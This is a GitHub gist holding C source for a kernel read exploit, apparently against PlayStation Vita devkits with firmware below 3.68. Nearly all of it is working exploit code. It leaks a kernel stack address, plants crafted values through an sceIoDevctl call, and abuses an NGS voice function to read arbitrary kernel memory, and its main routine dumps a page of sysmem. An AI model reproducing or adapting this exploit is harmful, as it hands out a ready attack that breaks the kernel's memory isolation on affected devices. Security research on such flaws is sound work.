Created
September 12, 2018 06:54
Star
You must be signed in to star a gist
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Kernel read exploit for devkits with FW < 3.68 by TheFloW | |
#include <psp2/appmgr.h> | |
#include <psp2/io/dirent.h> | |
#include <psp2/io/fcntl.h> | |
#include <psp2/io/stat.h> | |
#include <psp2/io/devctl.h> | |
#include <stdio.h> | |
#include <string.h> | |
#include <stdarg.h> | |
#include <malloc.h> | |
int sceMotionDevGetEvaInfo(void *info); | |
int sceNgsVoiceDefinitionGetPresetInternal(void *src, int pos, void *out); | |
int kernel_read_word(void *dst, void *src) { | |
uint32_t info[0x12]; | |
// 1) Call a function that writes sp to kernel stack | |
sceAppMgrLoadExec(NULL, NULL, NULL); | |
// 2) Leak kernel stack | |
sceMotionDevGetEvaInfo(info); | |
// 3) Get kernel stack address | |
uint32_t kstack_addr = info[3] & 0xFFFFF000; | |
uint32_t kstack_devctl_inbuf_addr = kstack_addr + 0xAF0 - 0x30; | |
// 4) Write data into kernel stack | |
uint32_t inbuf[2]; | |
inbuf[0] = (uint32_t)src - kstack_devctl_inbuf_addr; | |
inbuf[1] = 0xFFFFFFFF; | |
sceIoDevctl("", 0, inbuf, sizeof(inbuf), NULL, 0); | |
// 5) Read kernel | |
return sceNgsVoiceDefinitionGetPresetInternal((void *)kstack_devctl_inbuf_addr, 0, dst); | |
} | |
void kernel_read(void *dst, void *src, uint32_t size) { | |
uint32_t i; | |
for (i = 0; i < size; i += 4) { | |
kernel_read_word(dst + i, src + i); | |
} | |
} | |
int main() { | |
uint32_t info[0x12]; | |
// Leak kernel addresses | |
sceAppMgrLoadExec(NULL, NULL, NULL); | |
sceMotionDevGetEvaInfo(info); | |
uint32_t sysmem_addr = info[0] & 0xFFFFF000; | |
uint32_t kstack_addr = info[3] & 0xFFFFF000; | |
// Read sysmem | |
char sysmem_buf[0x1000]; | |
kernel_read(sysmem_buf, sysmem_addr, 0x1000); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment